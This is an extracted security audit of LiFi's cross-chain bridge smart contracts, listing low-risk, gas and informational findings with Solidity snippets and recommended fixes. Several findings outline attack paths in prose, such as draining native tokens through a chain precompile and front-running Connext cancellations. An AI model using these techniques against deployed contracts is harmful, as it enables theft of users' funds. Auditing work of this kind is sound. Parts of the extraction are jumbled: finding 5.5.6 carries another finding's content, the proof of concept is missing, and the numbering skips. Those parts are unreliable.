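    // Pulls `amount` tokens and reverts unless exactly `amount` arrived.
    // safeTransferFrom handles missing or false return values; the balance
    // comparison additionally catches fee-on-transfer tokens.
    function pullExact(IERC20 token, address from, uint256 amount) internal {
        uint256 balanceBefore = token.balanceOf(address(this));
        token.safeTransferFrom(from, address(this), amount);
        if (token.balanceOf(address(this)) - balanceBefore != amount) revert InvalidAmount();
    }
}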
Also see issue "Move code to check amount of tokens transferred to library". LiFi: Fixed with PR #21. Spearbit: Verified. 39 +5.3.16 Move code to check amount of tokens transferred to library Severity: Low Risk Context: ArbitrumBridgeFacet.sol#L50-L55, GenericBridgeFacet.sol#L41-L45, OptimismBridgeFacet.sol#L49- L54, PolygonBridgeFacet.sol#L49-L54, StargateFacet.sol#L81-L86, LibAsset.sol#L99-L101 in ArbitrumBridgeFacet.sol, GenericBridge- Description: Facet.sol,OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. The following piece of code is present However it doesn’t check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); } Recommendation: Use LibAsset.depositAsset(). And/or consider integrating this functionality to check the amount of tokens transferred, in function LibAsset.transferFromERC20() for situations where msg.value is used in combination with ERC20 transfers, for example to pay fees. LiFi: Fixed with PR #57. Spearbit: Verified. +5.3.17 Fuse pools are not whitelisted Severity: Low Risk Context: FusePoolZap.sol#L42 Description: Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of pool is not checked. Be- cause of Fuse is permissionless framework, an attacker can create a fake pool, through this contract a user can be be tricked in the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {} Recommendation: It is recommended to verify correctness of the pool, for instance poolExists can be utilized for this purpose. LiFi: Fixed with PR #6. Spearbit: Verified. 40 +5.3.18 Missing two-step transfer ownership pattern Severity: Low Risk Context: Executor.sol#L19 Description: Executor contract used for arbitrary cross-chain and same chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin which is a simple mechanism to transfer the ownership not supporting a two-steps transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner "role" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation and transferring it to an inaccessible wallet or renouncing the owner- ship e.g. by mistake, can effectively lost functionality. Recommendation: It is recommended to implement a two-step transfer ownership mechanism where the owner- ship is transferred and later claimed by a new owner to confirm the whole process and prevent lockout. As OpenZeppelin ecosystem does not provide such implementation it has to be done in-house. For the inspiration BoringOwnable can be considered, however it has to be well tested, especially in case it is integrated with other OpenZeppelin’s contracts used by the project. References • access • BoringOwnable LiFi: Fixed with PR #20. Spearbit: Verified. 
+5.3.19 Use low-level call only on contract addresses Severity: Low Risk Context: Executor.sol#L285, Executor.sol#L314 Description: In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user's intention here is to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. Otherwise, users can be under the wrong assumption that their cross-chain call was successful. Recommendation: Check if callTo is an EOA (which means it doesn't have any code), and revert if so. This is shown in the following diff:
+ bool isContract = LibAsset.isContract(callTo);
+ if (!isContract) {
+     revert CallToEoaAddress();
+ }
  (bool success, ) = callTo.call(callData);
LiFi: Fixed with PR #12. Spearbit: Verified. +5.3.20 Functions which do not expect ether should be non-payable Severity: Low Risk Context: AmarokFacet.sol#L63 Description: A function which doesn't expect ether should not be marked payable. swapAndStartBridgeTokensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the contract. Recommendation: Remove the payable keyword from swapAndStartBridgeTokensViaAmarok(), which will make this function revert if it receives ether. LiFi: Fixed with PR #19. Spearbit: Verified. +5.3.21 Incompatible contract used in the WormholeFacet Severity: Low Risk Context: WormholeFacet.sol#L13 Description: During the code review, it has been observed that all other facets are using the SwapperV2 contract, while the WormholeFacet is still using the Swapper contract. With the recent change to SwapperV2, leftovers can be sent to a specific receiver; by using the old contract, this capability is lost in the related facet. Also, the LiFi team states that the Swapper contract will be deprecated. ... import { Swapper } from "../Helpers/Swapper.sol"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ... Recommendation: Consider using the SwapperV2 contract instead of the Swapper contract. LiFi: Fixed with commit 6f2d. Spearbit: Verified. +5.3.22 Solidity version bump to latest Severity: Low Risk Context: LiFi src Description: During the review, the newest version of Solidity was released with important bug fixes. Recommendation: Move from 0.8.13 to 0.8.17. LiFi: Fixed with PR #95. Spearbit: Verified. +5.3.23 Bridge with AmarokFacet can fail due to hardcoded variables Severity: Low Risk Context: AmarokFacet.sol#L137 Description: During the code review, it has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that they are only set to 0 on the testnet. On the mainnet, these variables can be edited by Connext, and AmarokFacet bridge operations can fail. ...
IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... Recommendation: It is recommended to take the callbackFee and relayerFee parameters from the _bridgeData. LiFi: Fixed with PR #31. Spearbit: Verified. 5.4 Gas Optimization +5.4.1 Store _dexs[i] into a temp variable Severity: Gas Optimization Context: DexManagerFacet.sol#L51-L97 Description: The DexManagerFacet can store _dexs[i] in a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } } Recommendation: Store _dexs[i] in a temp variable. LiFi: Fixed with commit 7c3c. Spearbit: Verified. +5.4.2 Optimize array length in for loop Severity: Gas Optimization Context: SwapperV2.sol#L72, Swapper.sol#L69, StargateFacet.sol#L107, GenericBridgeFacet.sol#L78, Executor.sol#L328 Description: In a for loop, the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... } Recommendation: In a for loop, store the length of an array in a temporary variable. LiFi: Fixed with PR #84. Spearbit: Verified. +5.4.3 StargateFacet can be optimized Severity: Gas Optimization Context: StargateFacet.sol#L206 Description: It might be cheaper to call getTokenFromPoolId in a constructor and store the result in immutable variables (especially because there are not that many pools, currently max 3 per chain, see pool-ids). On the other hand, it requires an update of the facet when new pools are added. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and look up the pool id. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId, i.e. the same asset is received on the destination chain; this seems a logical restriction. The advantage of not having to specify the pool ids is that you abstract the interface from the caller and make the function calls more similar. Recommendation: If there is no logical restriction, consider keeping the variables as immutables set in the constructor. LiFi: Deprecated by PR #75. Spearbit: Acknowledged.
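To make the immutable approach concrete, a hedged sketch: the interfaces below mirror the calls in getTokenFromPoolId() above, while the contract name StargatePoolTokenCache is hypothetical:
pragma solidity ^0.8.17;

interface IStargateRouter {
    function factory() external view returns (address);
}

interface IFactory {
    function getPool(uint256 _poolId) external view returns (address);
}

interface IPool {
    function token() external view returns (address);
}

contract StargatePoolTokenCache {
    // Resolved once at deploy time; saves three external calls per bridge transaction.
    address public immutable srcPoolToken;

    constructor(address _router, uint256 _srcPoolId) {
        address factory = IStargateRouter(_router).factory();
        address pool = IFactory(factory).getPool(_srcPoolId);
        srcPoolToken = IPool(pool).token();
    }
}
The trade-off named in the finding applies: adding or changing a pool then requires redeploying the facet.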
+5.4.4 Use block.chainid for chain ID verification in HopFacet Severity: Gas Optimization Context: HopFacet.sol#L102, HopFacet.sol#L110 Description: HopFacet.sol uses the user-provided _hopData.fromChainId to identify the current chain ID. The call to the Hop Bridge will revert if it does not match block.chainid, so this is still secure. However, as a gas optimization, this parameter can be removed from the HopData struct, and its usage can be replaced by block.chainid. Recommendation: Apply the following diff: - if (_hopData.fromChainId == _hopData.toChainId) revert CannotBridgeToSameNetwork(); + if (block.chainid == _hopData.toChainId) revert CannotBridgeToSameNetwork(); ... - if (_hopData.fromChainId == 1) { + if (block.chainid == 1) { LiFi: Fixed with PR #46. Spearbit: Verified. +5.4.5 Rename error InvalidAmount(uint256) to ZeroAmount() Severity: Gas Optimization Context: FusePoolZap.sol#L27, FusePoolZap.sol#L51-L53, FusePoolZap.sol#L83-L85 Description: The error InvalidAmount(uint256) is thrown only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever thrown. Recommendation: Rename the error InvalidAmount(uint256) to ZeroAmount(), and change the if conditions as follows: if (_amount == 0) { revert ZeroAmount(); } ... if (msg.value == 0) { revert ZeroAmount(); } LiFi: Fixed with PR #42. Spearbit: Verified. +5.4.6 Use custom errors instead of strings Severity: Gas Optimization Context: LiFiDiamond.sol#L38, LibDiamond.sol#L56, LibDiamond.sol#L84, LibDiamond.sol#L86, LibDiamond.sol#L95, LibDiamond.sol#L102, LibBytes.sol#L280 Description: To save some gas, use custom errors, which lead to cheaper deploy-time cost and run-time cost. The run-time cost is only relevant when the revert condition is met. Recommendation: Consider using custom errors instead of revert strings. LiFi: Fixed with PR #15. Spearbit: Verified. +5.4.7 Use calldata over memory Severity: Gas Optimization Context: AxelarFacet.sol#L31, AxelarFacet.sol#L32, AxelarFacet.sol#L60, AxelarFacet.sol#L61 Description: When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * array.length). Using calldata directly obviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified, and therefore memory is used in the external call, it's still more gas-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. There are some gas savings if function arguments are passed as calldata instead of memory. Recommendation: Use calldata in these instances. LiFi: Fixed with PR #59. Spearbit: Verified. +5.4.8 Avoid reading from storage when possible Severity: Gas Optimization Context: FeeCollector.sol#L119, FeeCollector.sol#L136, FeeCollector.sol#L161 Description: Functions which can only be called by the contract's owner can use msg.sender instead of reading the owner's address after the ownership check is done. In all the cases below, the ownership check is already done, so it is guaranteed that owner == msg.sender.
LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead. Recommendation: Replace owner with msg.sender for all the instances pointed out here. LiFi: Fixed with PR #36. Spearbit: Verified. +5.4.9 Increment for loop variable in an unchecked block Severity: Gas Optimization Context: StargateFacet.sol#L107, DexManagerFacet.sol#L50, DexManagerFacet.sol#L76, DexManagerFacet.sol#L95, DexManagerFacet.sol#L131, DiamondLoupeFacet.sol#L24, FeeCollector.sol#L98, FeeCollector.sol#L130, GenericBridgeFacet.sol#L78, Executor.sol#L328, Executor.sol#L341, SwapperV2.sol#L31, SwapperV2.sol#L72, SwapperV2.sol#L89 Description: (This is only relevant if you are using the default Solidity checked arithmetic.) i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } } Recommendation: Consider incrementing the for loop variable in an unchecked block. LiFi: Fixed with PR #58. Spearbit: Verified. 5.5 Informational +5.5.1 Executor should consider pre-deployed contract behaviors Severity: Informational Context: Executor.sol#L280, Executor.sol#L303 Description: The Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different EVM-compatible chains would have different security assumptions. Please refer to the Avax bug fix: native-asset-call deprecation. Were the native asset call not deprecated, exploiters could bypass the check and trigger ERC20Proxy through the pre-deployed contract. Since the Avalanche team has deprecated the dangerous pre-deploy, the current Executor contract is not vulnerable. Moonbeam's pre-deployed contracts also have strange behaviors. The ERC20 precompile allows users to transfer the native token through an ERC20 interface. Users can steal native tokens from the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount). One of the standard Ethereum mainnet precompiles is "Identity" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC:
This will prevent calling precompiles with 0 codesize. We also suggest checking precompiles and documentation carefully before launching on a new chain. +5.5.2 Documentation improvements Severity: Informational Context: HyphenFacet.md#L15, README.md#L3 Description: There are a few issues in the documentation: • HyphenFacet’s documentation describes a function no longer present. • Link to DexManagerFacet in README.md is incorrect. Recommendation: • Delete line at HyphenFacet.md#L15. • Change README.md#L3 to: - - [DEX Manager Facet](/DexManagerFacet.md) + - [DEX Manager Facet](./DexManagerFacet.md) LiFi: Implemented with PR #90. Spearbit: Verified. 48 +5.5.3 Check quoteTimestamp is within ten minutes Severity: Informational Context: AcrossFacet.sol#L111 Description: quoteTimestamp is not validated. According to Across, quoteTimestamp variable, at which the depositor will be quoted for L1 liquidity. This enables the depositor to know the L1 fees before submitting their deposit. Must be within 10 mins of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, ,! _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); } Recommendation: Validate quoteTimestamp on the facet. LiFi: Fixed with PR #82, PR #97. Spearbit: Verified. +5.5.4 Integrate two versions of depositAsset() Severity: Informational Context: LibAsset.sol#L89-L110 Description: The function depositAsset(, , isNative ) doesn’t check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isn’t used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); } Recommendation: Consider to integrate the two functions. Could also use isNativeAsset() instead of tokenId == NATIVE_ASSETID. LiFi: Fixed with PR #75. Spearbit: Verified. 49 +5.5.5 Simplify batchRemoveDex() Severity: Informational Context: DexManagerFacet.sol#L86-L109 Description: The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } } Recommendation: Consider changing the code to something like the following: function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... uint256 jlength = storageDexes.length; for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } - + - } LiFi: Fixed with PR #88. Spearbit: Verified. 
+5.5.6 Error handling in executeCallAndWithdraw Severity: Informational Context: WithdrawFacet.sol#L35-L59 Description: If isContract happens to be false, then success is false (as it is initialized to false and never updated), and thus _withdrawAsset() will never happen. The function withdraw() also exists, so this functionality isn't strictly necessary, but it is more logical to revert earlier.
Also, _startBridge() tries to send native tokens with { value: _anyswapData.amount } when isNative == true, but this wouldn't work with wrapped tokens. The howto seems to indicate an approval (of the wrapped native token) is necessary.
contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard {
    function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... {
        // Multichain (formerly Anyswap) tokens can wrap other tokens
        (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router);
        if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount);
        ...
    }
    function _getUnderlyingToken(address token, address router) ... {
        ...
        if (token == address(0)) revert TokenAddressIsZero();
        underlyingToken = IAnyswapToken(token).underlying();
        // The native token does not use the standard null address ID
        isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken;
        // Some Multichain complying tokens may wrap nothing
        if (!isNative && underlyingToken == address(0)) {
            underlyingToken = token;
        }
    }
    function _startBridge(...) ... {
        ...
        if (isNative) {
            IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // send native tokens
        }
        ...
    }
}
Recommendation: Double-check the conclusions about the native tokens and update the logic for native tokens if necessary. LiFi: Fixed with PR #81. Spearbit: Verified.
+5.5.11 Remove payable in swapAndCompleteBridgeTokensViaStargate() Severity: Informational Context: Executor.sol#L105-L171
Description: There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The function swapAndCompleteBridgeTokensViaStargate() of Executor is payable but doesn't receive native tokens.
contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {
    function sgReceive(...) external { // not payable
        ...
        this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // doesn't send native assets
        ...
    }
    function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable
        if (msg.sender != address(this)) {
            revert InvalidCaller();
        }
    }
}
Recommendation: Consider removing the payable keyword. Note: also see issue "Use internal where possible", which will also solve this. LiFi: Fixed with commit 78ac. Spearbit: Verified.
+5.5.12 Use the same order for inherited contracts Severity: Informational Context: LiFi src
Description: The inheritance of contracts isn't always declared in the same order. For code consistency it's best to always put them in the same order.
contract AmarokFacet         is ILiFi, SwapperV2, ReentrancyGuard {
contract AnyswapFacet        is ILiFi, SwapperV2, ReentrancyGuard {
contract ArbitrumBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard {
contract CBridgeFacet        is ILiFi, SwapperV2, ReentrancyGuard {
contract GenericSwapFacet    is ILiFi, SwapperV2, ReentrancyGuard {
contract GnosisBridgeFacet   is ILiFi, SwapperV2, ReentrancyGuard {
contract HopFacet            is ILiFi, SwapperV2, ReentrancyGuard {
contract HyphenFacet         is ILiFi, SwapperV2, ReentrancyGuard {
contract NXTPFacet           is ILiFi, SwapperV2, ReentrancyGuard {
contract OmniBridgeFacet     is ILiFi, SwapperV2, ReentrancyGuard {
contract OptimismBridgeFacet is ILiFi, SwapperV2, ReentrancyGuard {
contract PolygonBridgeFacet  is ILiFi, SwapperV2, ReentrancyGuard {
contract StargateFacet       is ILiFi, SwapperV2, ReentrancyGuard {
contract GenericBridgeFacet  is ILiFi, ReentrancyGuard {
contract WormholeFacet       is ILiFi, ReentrancyGuard, Swapper {
contract AcrossFacet         is ILiFi, ReentrancyGuard, SwapperV2 {
contract Executor            is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {
Recommendation: Always use the same order for inherited contracts. LiFi: Fixed with PR #80. Spearbit: Verified.
+5.5.13 Catch potential revert in swapAndStartBridgeTokensViaStargate() Severity: Informational Context: StargateFacet.sol#L95-L114
Description: The following statement nativeFee -= _swapData[i].fromAmount; can revert in swapAndStartBridgeTokensViaStargate().
function swapAndStartBridgeTokensViaStargate(...) ... {
    ...
    for (uint8 i = 0; i < _swapData.length; i++) {
        if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) {
            nativeFee -= _swapData[i].fromAmount; // can revert
        }
    }
    ...
}
Recommendation: Consider catching this situation and giving an appropriate error message (a sketch follows after 5.5.15 below). LiFi: Fixed with PR #85. Spearbit: Verified.
+5.5.14 No need to use library name if it is in the same file Severity: Informational Context: LibAsset.sol#L99-L101
Description: In LibAsset, some of the functions are called through the LibAsset. prefix; however, there is no need for this because the functions are in the same Solidity file.
...
if (msg.value != 0) revert NativeValueWithERC();
uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId);
LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount);
if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();
...
Recommendation: Change the implementation to:
...
- uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId);
- LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount);
- if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();
+ uint256 _fromTokenBalance = getOwnBalance(tokenId);
+ transferFromERC20(tokenId, msg.sender, address(this), amount);
+ if (getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();
...
LiFi: Fixed in the recent LibAsset.sol version. Spearbit: Verified.
+5.5.15 Combined Optimism and Synthetix bridge Severity: Informational Context: OptimismBridgeFacet.sol#L89-L130
Description: The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is clearer to have a separate facet for this.
function _startBridge(...) ... {
    ...
    if (_bridgeData.isSynthetix) {
        bridge.depositTo(_bridgeData.receiver, _amount);
    } else {
        ...
    }
}
Recommendation: Consider using a separate facet for the Synthetix bridge. LiFi: We don't have any plans to separate and maintain two separate facets for this. Spearbit: Acknowledged.
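As referenced in 5.5.13, a hedged sketch of an explicit check that replaces the bare arithmetic underflow with a descriptive error; the library, error name and helper are hypothetical, not part of the audited code:
library NativeFeeSketch {
    error InsufficientNativeFee(uint256 available, uint256 required);

    // Replaces the bare Panic(0x11) underflow revert with a descriptive error.
    function consume(uint256 nativeFee, uint256 fromAmount) internal pure returns (uint256) {
        if (nativeFee < fromAmount) revert InsufficientNativeFee(nativeFee, fromAmount);
        return nativeFee - fromAmount;
    }
}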
+5.5.16 Double-check the Diamond pattern Severity: Informational Context: ERC20Proxy.sol
Description: The LiFi protocol uses the diamond pattern. This pattern is relatively complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). With all the bridges combined in one contract, an issue in one bridge might have an influence on another bridge.
Recommendation: Consider having separate contracts for separate bridges. If one destination for allowances is desired, consider using the ERC20Proxy.sol on the source chain. LiFi: LiFi Team claims that there are no plans to switch patterns at this time. Spearbit: Acknowledged.
+5.5.17 Reference Diamond standard Severity: Informational Context: LiFiDiamond.sol
Description: The LiFiDiamond.sol contract doesn't contain a reference to the Diamond standard. Having that would make it easier for readers of the code to find the origin of the contract.
Recommendation: Consider adding a reference to the diamond standard: eip-2535. LiFi: Added with PR #83. Spearbit: Verified.
+5.5.18 Validate Nxtp InvariantTransactionData Severity: Informational Context: NXTPFacet.sol#L80
Description: During the code review, it was noticed that InvariantTransactionData's fields are not validated. Even though validation is located in the router, the sendingChainFallback and receivingAddress parameters are sensitive, and Connext does not give a meaningful error message when validating these parameters. Also, the router parameter does not have any validation, while most of the other facets have one. For instance: Amarok Facet. Note: also see issue "Hardcode bridge addresses via immutable".
function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) {
    ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager);
    IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId);
    // Give Connext approval to bridge tokens
    LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount);
    uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0;
    // Initiate bridge transaction on sending chain
    ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }(
        ITransactionManager.PrepareArgs(
            _nxtpData.invariantData,
            _nxtpData.amount,
            _nxtpData.expiry,
            _nxtpData.encryptedCallData,
            _nxtpData.encodedBid,
            _nxtpData.bidSignature,
            _nxtpData.encodedMeta
        )
    );
    return result.transactionId;
}
Recommendation: Implement validations on the parameters. Ensure that fields like sendingChainFallback and receivingAddress are not empty, and hardcode or whitelist the router parameter via immutable. LiFi: Fixed with PR #69. Spearbit: Verified.
+5.5.19 Executor contract should not handle cross-chain swap from Connext Severity: Informational Context: Executor.sol#L173-L221
Description: The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333
function _executeSwaps(
    LiFiData memory _lifiData,
    LibSwap.SwapData[] calldata _swapData,
    address payable _receiver
) private noLeftovers(_swapData, _receiver) {
    for (uint256 i = 0; i < _swapData.length; i++) {
        if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ERC20 Proxy directly
        LibSwap.SwapData calldata currentSwapData = _swapData[i];
        LibSwap.swap(_lifiData.transactionId, currentSwapData);
    }
}
However, the receiver address is a privileged address in some bridging services, and allowing users to do arbitrary execution / external calls is dangerous. The Connext protocol is an example: Connext contractAPI#cancel. The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds are sent to the fallback address without executing the external call. Exploiters can front-run a Gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receiver's address. The exploiters can grab the tokens left in the Executor in the same transaction.
Recommendation: Since the Executor is designed to handle execution at the destination chain, some restrictions should be put on the external call. We recommend only allowing whitelisted actions, or never using the Executor to handle a cross-chain swap from Connext.
LiFi: The Executor was designed to be separate from the main LIFI protocol contract so that devs can integrate and build what they wish. This is why we do not have a whitelist. The cancel method you speak of does not allow just anyone to call as far as we know. It must be called with a signature from the actual user's wallet. We plan to keep this contract open while mitigating as much as possible.
Spearbit: Thanks for pointing this out. The cancel method only allows msg.sender == user or a valid signature signed by the user. TransactionManager.sol#L619. Downgrading the severity as args.txData.user is usually directly set to the user's wallet instead of the executor contract.
+5.5.20 Avoid using strings in the interface of the Axelar Facet Severity: Informational Context: AxelarFacet.sol#L30-L66
Description: The Axelar Facet uses strings to indicate the destinationChain and destinationAddress, which is different than on other bridge facets.
function executeCallWithTokenViaAxelar(
    string memory destinationChain,
    string memory destinationAddress,
    string memory symbol,
    ...
) ... { }
The contract address is (or at least can be) encoded as a hex string, as seen in this example: https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2
#  Name                        Type     Data
0  destinationChain            string   binance
1  destinationContractAddress  string   0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2
2  payload                     bytes
3  symbol                      string   USDC
4  amount                      uint256  50000000
The Axelar bridge allows bridging to non-EVM chains; however, the LiFi protocol doesn't seem to support this, so it's good to prevent accidentally sending to non-EVM chains. Here are the supported non-EVM chains: non-evm-networks. The Axelar interface doesn't have a (compatible) emit.
Recommendation: Consider doing the following for both executeCallViaAxelar() and executeCallWithTokenViaAxelar(): change destinationChain, destinationAddress and symbol to types uint.., address, address, and have a mapping/conversion to a string within the function (a conversion sketch follows below). Check the destinationChain to limit the transfers to EVM chains only. The token name can be retrieved from the token contract itself and verified via the Axelar tokenAddresses() function. Note: also see issue "Event of transfer is not emitted in the AxelarFacet". Note: also see issue "Use same layout for facets". If the interfaces aren't changed, at least check that destinationAddress can be converted from hex to a valid address. LiFi: Fixed with PR #67. Spearbit: Verified.
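To illustrate the recommendation for 5.5.20, a hedged sketch of accepting typed parameters and converting them to the strings Axelar expects inside the facet; it assumes OpenZeppelin's Strings.toHexString helper, and the chain-id-to-name mapping and contract name are hypothetical:
import { Strings } from "@openzeppelin/contracts/utils/Strings.sol";

contract AxelarParamSketch {
    // hypothetical owner-maintained mapping, e.g. 56 => "binance"
    mapping(uint256 => string) public chainName;

    function toAxelarParams(uint256 destinationChainId, address destinationAddress)
        internal
        view
        returns (string memory chain, string memory addr)
    {
        chain = chainName[destinationChainId];
        // an empty mapping entry doubles as a guard against non-EVM / unsupported chains
        require(bytes(chain).length != 0, "unsupported chain");
        // "0x"-prefixed, 20-byte hex encoding of the address
        addr = Strings.toHexString(uint256(uint160(destinationAddress)), 20);
    }
}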
+5.5.21 Hardcode source Nomad domain ID via immutable Severity: Informational Context: AmarokFacet.sol#L130
Description: AmarokFacet takes the source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain. The user-provided value can be incorrect, and Connext will later revert the transaction. See BridgeFacet.sol#L319-L321:
if (_args.params.originDomain != s.domain) {
    revert BridgeFacet__xcall_wrongDomain();
}
